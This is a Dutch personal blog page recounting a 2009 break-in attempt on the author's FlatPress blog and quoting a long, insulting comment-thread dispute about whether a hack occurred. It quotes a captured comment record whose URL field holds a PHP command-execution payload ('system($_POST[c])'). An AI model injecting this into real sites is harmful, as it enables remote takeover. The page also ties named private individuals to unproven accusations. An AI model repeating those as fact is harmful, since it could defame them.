summumplus.be blog doelwit van (poging tot) computervredebreuk (6 oktober 2009) | Joachim De Zutter
Brecht Ryckaert (https://www.facebook.com/brecht.ryckaert) was sedert augustus 2008 Facebook-vriend van Melina Van Damme. Zij gebruikte MSN.

Op 29 september 2009 werd via de Bugtraq mailing list remote exploit code gepubliceerd voor een beveiligingslek in FlatPress 0.804 tot en met 0.812.1.

Na installatie van de FlatPress blog software (versie 0.812.1) vonden we op een gegeven moment in een bestand onder een comments/ directory de volgende inhoud:

VERSION|fp-0.812.1|NAME|1642341146|EMAIL|fake@fake.com|URL|http://www.aaa<?system($_POST[c])?><?system("$asc");?>aaa.com|CONTENT|foo|IP-ADDRESS|200.63.98.17|DATE|1254800112|

Op 6 oktober 2009 23:28:36 +0200 was de blog reeds tijdelijk uitgeschakeld om verder misbruik te voorkomen. Daarna werd een recentere versie van de FlatPress blog software geinstalleerd waarin het beveiligingslek niet aanwezig was.

Iemand probeerde op 5 en 6 januari 2010 onder pseudoniem "worstbrecht" in de commentaren op de Schamper-website de feiten omtrent het dreigbericht op 5 oktober 2009 en de inbraakpoging op 6 oktober 2009 herhaaldelijk te minimaliseren en begon te beledigen:

Op 1 januari 2010 rond 23:49 geplaatst door "worstbrecht":
"[...], kun je tegen [...] zeggen dat hij zijn blogs er terug moet opzetten? Ik mis zijn schrijfvaardigheid."

Op 5 januari 2010 rond 14:31 geplaatst door "worstbrecht":
"Dat bericht van Ludwig is toch nauwelijks een dreigbericht te noemen..."

Op 5 januari 2010 rond 18:22 geplaatst door "worstbrecht":
[...] "je beseft toch dat een groot aantal mensen tegelijkertijd" [...] "uitlachten? Zijn blogs waren namelijk hilarisch en de links werden redelijk vlug verspreid op msn. En hoe exact werd de website “gehackt”? Daar blijf je wel merkwaardig vaag over."

Op 5 januari 2010 rond 18:56 geplaatst door "worstbrecht":
"“dreigbericht”.
Wat exact is het dreigement? Dat de kunstliefhebbers dit niet zullen pikken? In het ergste geval betekent dat dat ze zijn “kunst“website niet meer zullen bezoeken.
[...]
Verder is er geen toonbaar verband tussen Ludwig en de zogenaamde hacker. Je bent enorm vaag over de zogenaamde hackpoging. Ik zie nergens waar exact er gehackt werd. Wat waren de gevolgen van de “hackpoging”?

Het enige dat ik zie is dat iemand zijn IP-adres probeerde te verbergen, zoals duidelijk wordt op het einde van je log:
“next time, try your luck with invisiblegodmode.pl”
Daarom dat je ook begint over scriptkiddies. Iemand die zijn IP-adres tracht te verbergen is heel wat anders dan een website proberen te hacken."

Op 5 januari 2010 rond 19:19 geplaatst door "worstbrecht":
"Ik ben Laurens niet" [...]

Op 5 januari 2010 rond 22:04 geplaatst door "worstbrecht":
"wil je eens stoppen met rond te pot te draaien? Je hebt nu nog steeds niets verteld wat het ‘hacken’ nu eigenlijk inhield. Voor zover ik kan bemerken, gaat het gewoon om iemand die met een verborgen IP-adres trachtte te surfen. En voor zover ik weet, is dat niet strafbaar."

Op 5 januari 2010 rond 22:24 geplaatst door "worstbrecht":
"Welke hack?"

Op 5 januari 2010 rond 22:34 geplaast door "worstbrecht":
"Ludwig, weet je waarom ze mij worstbrecht noemen?"

Op 5 januari 2010 rond 22:52 geplaatst door "worstbrecht":
[...] "wordt helemaal niet belaagd, drama queen."

Op 5 januari 2010 rond 23:20 geplaatst door "worstbrecht":
"[...], je bent een piemel."

Op 6 januari 2010 rond 15:24 geplaatst door "worstbrecht":
"[...], je bent een idioot.
[...]
En de volgende dag (6-10-2009 3:35:00) krijgen we een inbraak via de FlatPress blog:

VERSION|fp-0.812.1|NAME|1642341146|EMAIL|fake@fake.com|URL|http://www.aaaaaa.com|CONTENT|foo|IP-ADDRESS|200.63.98.17|DATE|1254800112|

http://www.utrace.de/ip-adresse/200.63.98.17

http://power4.powerhost.cl/
(Santiago, Chili)
[...]
Hoe in godsnaam is dat “hacken”? En hou op met spammen."

Op 6 januari 2010 rond 16:06 geplaatst door "worstbrecht":
"ik vraag niet dat de reacties verwijderd worden, het wordt gewoon irritant als iemand hetzelfde blijft herhalen, zonder rekening te houden met het feit dat het al meermaals weerlegd werd. Je beantwoordt elke vraag met je idiote link naar het zogenaamde gehack [...]"

Op 6 januari 2010 rond 16:25 geplaatst door "Anonieme lafaard":
"ben je nu letterlijk achterlijk of hoe zit dat? Ben je zo of doe je zo?
De blog [...] werd niet gehackt, punt. Van een cover-up is helemaal geen sprake, aangezien er niks gebeurd is. De relevantie van de door jou aangekaarte feiten ontgaat me ook. Wat is het verband tussen het feit dat een boze kunstliefhebber zijn ongenoegen uitte over de uitstelling van " [...] "s tentoonstelling en dit artikel? En waar leg je de link tussen iemand die zijn IP-adres verborg en een inbraak in jouw computersysteem? Zoals meermaals duidelijk werd gemaakt, lul je wat maar uit je nek."

Op 6 januari 2010 rond 16:26 geplaatst door "worstbrecht":
"maar wat*"

Op 6 januari 2010 rond 16:33 geplaatst door "worstbrecht":
"Ik voorspel dat "[...]"s reactie exact dit inhoudt: Wat is de link tussen Ludwig Langsachter uit Gent en Laurens Lavrysen en
het dreigbericht op 05/10/2009 en de hack de dag erna op de FlatPress blog van " [...]
Met de IP-logbestanden: [...]"

Op 6 januari 2010 rond 16:36 geplaatst door "worstbrecht":
"Waarom gaat Ludwig Langsachter zich niet gewoon gaan aangeven bij de politie ?
A: Omdat Ludwig niks gedaan heeft.
+++
Als de blog niet werd gehackt, waarom komt dan in de logbestanden van de FlatPress blog het bewijsmateriaal dat hij wel gehackt is ?
A: Je IP-adres verbergen is niet hetzelfde als hacken.
+++
Waarom worden de zaken hier zo sterk geminimaliseerd als men onschuldig is ?
A: De zaken worden niet geminimaliseerd, ze worden sterk opgeblazen door jou.
+++
Waarom worden de berichten om de haverklap aangevuld met nonsens gevonden met google om de aandacht van de kern van de zaak weg te houden ?
A: De kern van de zaak is niet" [...] "zijn pseudo-blog en het “dreigbericht”. De kern van de zaak is het feit dat [...] klaarblijkelijk mensen uitbuit(te??), zoals" [...] " zélf heeft toegegeven in zijn blogs.
+++
Hoe lang gaat deze cover-up nog duren ?
A: Hoe lang ga je nog blijven doordrammen over onbelangrijke zaken?
+++
Is er niemand hier in staat om ipv vragen te stellen ook vragen te beantwoorden ?
A: Jouw vragen werden al meermaals beantwoord. Op deze én vorige pagina’s."

Op 6 januari 2010 rond 16:51 geplaatst door "worstbrecht":
"“Fout! Ludwig heeft het dreigbericht geschreven, alsook een resem andere berichten.”
Het is geen dreigbericht, en de andere berichten zijn positief.
[...]
“Fout! Als je je IP-adres verbergt om te hacken, en je doet de hack, en het bewijsmateriaal is er, dan is dat hacken.”
Het probleem zit er hem in dat je een link geeft waarin enkel getoond wordt dat er een IP-adres verborgen wordt. Van hacken is er nog steeds geen sprake.
[...]
Het mysterie van de onopgeloste klaagberichten over een uitgestelde kunsttentoonstelling, die resulteerde in het verbergen van een IP-adres. Een onmenselijke misdaad. Tijd om Jommeke in te schakelen.
[...]
“Toch niet. Er is nog steeds geen bekentenis van de dader(s).”
Misschien kun je Anatool contacteren om druk uit te oefenen."

Op 6 januari 2010 rond 17:01 geplaatst door "Anonieme lafaard":
"“Het bericht is duidelijk een dreigbericht: “de kunstliefhebbers zullen dit niet pikken””
Op welke manier is dat een dreigbericht?
[...]
“Er werd een exploit gebruikt tegen de geïnstalleerde FlatPress blog dus van hacken is wel degelijk sprake.”
Neen, er werd een IP-adres verborgen.
[...]
“Dat is een crimineel feit dat volgens het strafwetboek nog steeds strafrechtelijk kan worden vervolgd.”
Dit is te belachelijk voor woorden. Een IP-adres verbergen is NIET strafbaar, en het dreigbericht is helemaal geen dreigbericht.

“Is dat nodig ? Het lijkt mij allemaal vrij duidelijk te zijn.”
Wat weet jij nu weeral van duidelijkheid? Je geest is zo troebel als de kunstwerken van" [...]

Op 6 januari 2010 rond 17:05 geplaatst door "worstbrecht":
"Bovenstaande reactie kwam van mij. :O)"

Op 6 januari 2010 rond 17:08 geplaatst door "worstbrecht":
"Belagen is strafbaar. > Niemand wordt belaagd.
Hacken is strafbaar. > Niks werd gehackt.
Aanzetten tot hacken is strafbaar. > Nergens werd er tot hacken aangezet.
Laster en eerroof is strafbaar. > Is nergens sprake van."

Op 6 januari 2010 rond 17:14 geplaatst door "worstbrecht":
"Dat is geen hack, dat is iemand die een Proxy gebruikt."

Op 6 januari 2010 rond 17:27 geplaatst door "worstbrecht":
"Mogelijk, maar dat is niet gebeurd. Er werd enkel een Proxy gebruikt."

Op 6 januari 2010 rond 17:33 geplaatst door "worstbrecht":
[...] "Je hebt geen poot om op te staan, en je weet het. Je bent hier aan het trollen ofwel in opdracht van" [...] ", ofwel omdat je een regelrechte idioot bent." [...]

Op 6 januari 2010 rond 17:44 geplaatst door "worstbrecht":
"Nogmaals, dat is iemand die een proxy gebruikte."

Op 6 januari 2010 rond 18:00 geplaatst door "worstbrecht":
"Welke hack is dat dan? Wat exact werd er gehackt? Wat waren de gevolgen van de zogenaamde hack?"

Op 6 januari 2010 rond 18:09 geplaatst door "worstbrecht":
"Daarnet zeg je nog dat je niet wilt toelichten wat er gehackt werd, en nu zeg je dat je dat wel gedaan hebt. Terwijl je weeral verwijst naar de link waarin te zien staat dat iemand een proxy gebruikt.
Van een cirkelredenering gesproken."

In juni 2011 was reeds overgeschakeld naar een WordPress-blog op wordpress.com.